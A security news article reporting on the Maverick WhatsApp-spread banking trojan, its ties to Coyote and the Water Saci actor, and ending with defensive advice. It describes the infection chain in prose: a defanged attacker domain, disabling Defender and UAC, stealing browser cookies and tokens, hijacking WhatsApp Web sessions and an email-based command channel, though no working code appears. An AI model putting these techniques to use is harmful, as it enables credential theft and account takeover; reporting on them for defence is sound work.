Maverick Malware Campaign Expands: WhatsApp-Propagated Banking Trojan Linked to Coyote

by | Nov 12, 2025 | News

Maverick Malware Campaign Expands: WhatsApp-Propagated Banking Trojan Linked to Coyote

Post Views: 30




Join our Patreon Channel and Gain access to 70+ Exclusive Walkthrough Videos.

Patreon
Reading Time: 3 Minutes

Overview

Cybersecurity researchers have drawn strong parallels between Maverick, a new WhatsApp-propagating malware strain, and Coyote, a notorious Brazilian banking trojan, suggesting both belong to the same evolving threat ecosystem.

The findings — from CyberProof, Trend Micro, and Sophos — reveal that both trojans share key characteristics:

  • Developed in .NET
  • Target Brazilian users and banks
  • Employ nearly identical code for URL monitoring and credential theft
  • Contain functionality to spread via WhatsApp Web

Maverick, attributed to a threat actor known as Water Saci, represents an advanced evolution of this lineage — merging credential-stealing and self-propagation into a fully autonomous malware-botnet model.

How the Maverick campaign works

The campaign begins with malicious ZIP archives shared through WhatsApp Web, containing a Windows shortcut (LNK) that launches a PowerShell command connecting to the attacker’s server at zapgrande[.]com.

Once executed, the infection chain unfolds as follows:

  1. LNK file execution: runs cmd.exe or PowerShell to download a loader.
  2. Defense evasion: disables Microsoft Defender Antivirus and User Account Control (UAC).
  3. Anti-analysis: checks for reverse engineering tools; terminates if detected.
  4. Payload delivery: downloads two modules — SORVEPOTEL (a propagation agent) and Maverick (the banking malware).
  5. Geo-filtering: installs Maverick only if the host’s time zone, language, and locale confirm it’s in Brazil.

CyberProof also found evidence that hotels in Brazil were targeted, showing that Water Saci may be expanding beyond banking institutions into the hospitality sector.

See Also: So, you want to be a hacker?
Offensive Security, Bug Bounty Courses



Discover your weakest link. Be proactive, not reactive. Cybercriminals need just one flaw to strike.

Technical details: SORVEPOTEL and Maverick

The SORVEPOTEL module serves as both downloader and propagator, while Maverick handles credential theft, browser hijacking, and command execution.

Maverick’s capabilities include:

  • Monitoring active browser tabs for banking URLs in Latin America.
  • Displaying fake login or phishing pages to harvest credentials.
  • Gathering system and browser data (cookies, tokens, session info).
  • Executing commands from a remote C2 server for reconnaissance and persistence.

Water Saci’s evolving attack chain

Trend Micro’s latest research shows that Water Saci has replaced its earlier .NET payloads with Visual Basic Script (VBS) and PowerShell-based loaders to increase stealth and flexibility.

New Water Saci attack chain observed

The new campaign hijacks WhatsApp Web sessions via ChromeDriver and Selenium automation, using the victim’s browser profile data to send malware-laden ZIP files to all contacts without triggering security alerts.

Updated attack sequence:

  1. User downloads and extracts a malicious ZIP file.
  2. The included Orcamento.vbs downloader (SORVEPOTEL) runs and executes tadeu.ps1 in memory.
  3. The PowerShell script takes over the victim’s WhatsApp Web session, sending ZIP files to all contacts.
  4. A fake “WhatsApp Automation v6.0” banner masks the malicious activity.
  5. The malware copies the victim’s Chrome profile data, including cookies and authentication tokens, for seamless session hijacking.

This approach gives attackers instant access to victims’ WhatsApp accounts without requiring QR codes or triggering login warnings, enabling rapid, automated propagation.

Water Saci campaign timeline

 

Email-based command-and-control (C2)

One of the most unusual elements of Water Saci’s framework is its email-based C2 infrastructure, using IMAP connections to terra.com[.]br accounts secured with multi-factor authentication (MFA).

Commands are retrieved directly from the attacker-controlled inbox, reducing traceability.
Supported C2 commands include:

  • System control: REBOOT, SHUTDOWN, UPDATE
  • File ops: UPLOAD, DOWNLOAD, DELETE, MOVE, RENAME
  • Execution: CMD, POWERSHELL, SCREENSHOT, TASKLIST
  • Recon: INFO, FILE_INFO, SEARCH
  • Persistence management: CREATE_FOLDER, LIST_FILES, CHECK_EMAIL

This model allows manual, stealthy control — with operators even entering MFA codes manually to maintain access.

Trending: Can Outsourcing Actually Save You Money?




Trending: Offensive Security Tool: EvilWAF – Web Application Firewall Bypass Toolkit

Why WhatsApp is the perfect vector

With 148 million active users in Brazil, WhatsApp is deeply embedded in both personal and business communications.
Water Saci exploits this by:

  • Using trust in personal contacts to bypass phishing suspicion.
  • Hijacking legitimate sessions for frictionless malware propagation.
  • Delivering highly localized, Portuguese-language lures.

Trend Micro notes that this “weaponization of trusted social apps” marks a major shift in Brazilian cybercrime tactics — from spam-based delivery to peer-to-peer infection via messaging ecosystems.

Coyote connection confirmed

Multiple security firms — including Kaspersky, Sophos, and CyberProof — confirm that Maverick shares code segments, logic, and propagation functions with Coyote, an earlier .NET banking trojan also spread in Brazil.

While opinions differ on whether Maverick is a rebranded successor or a distinct strain, the consensus is clear:
both belong to the same Brazilian threat ecosystem, and both exhibit identical targeting of financial institutions.

“Linking the Water Saci campaign to Coyote reveals a significant evolution in Brazil’s banking malware scene,” Trend Micro stated.
“Threat actors have transitioned from standalone payloads to leveraging legitimate browser profiles and messaging apps for stealthy, scalable propagation.”

Defensive guidance

Organizations and individuals in Brazil and Latin America should implement the following mitigations:

  • Block and monitor ZIP, LNK, VBS, and PowerShell downloads from unverified sources.
  • Restrict use of browser automation frameworks (Selenium, ChromeDriver).
  • Apply strong endpoint protection with behavioral detection for script-based malware.
  • Use MFA on WhatsApp and other social platforms where supported.
  • Educate users on WhatsApp-based social engineering and fake “automation” prompts.
  • Regularly clear browser sessions and cookies to reduce hijack risk.
  • Monitor email systems for IMAP-based command traffic or unusual authentication attempts.

Trending: Freight Brokers Hit by RMM-Based Cyber Attacks Aimed at Physical Cargo Theft

Are u a security researcher? Or a company that writes articles about Cyber Security, Offensive Security (related to information security in general) that match with our specific audience and is worth sharing? If you want to express your idea in an article contact us here for a quote: [email protected]

Source: thehackernews.com, www.trendmicro.com

Source Link

Merch

Recent News

EXPLORE OUR STORE

Offensive Security & Ethical Hacking Course

Begin the learning curve of hacking now!

Information Security Solutions

Find out how Pentesting Services can help you.

Join our Community

Share This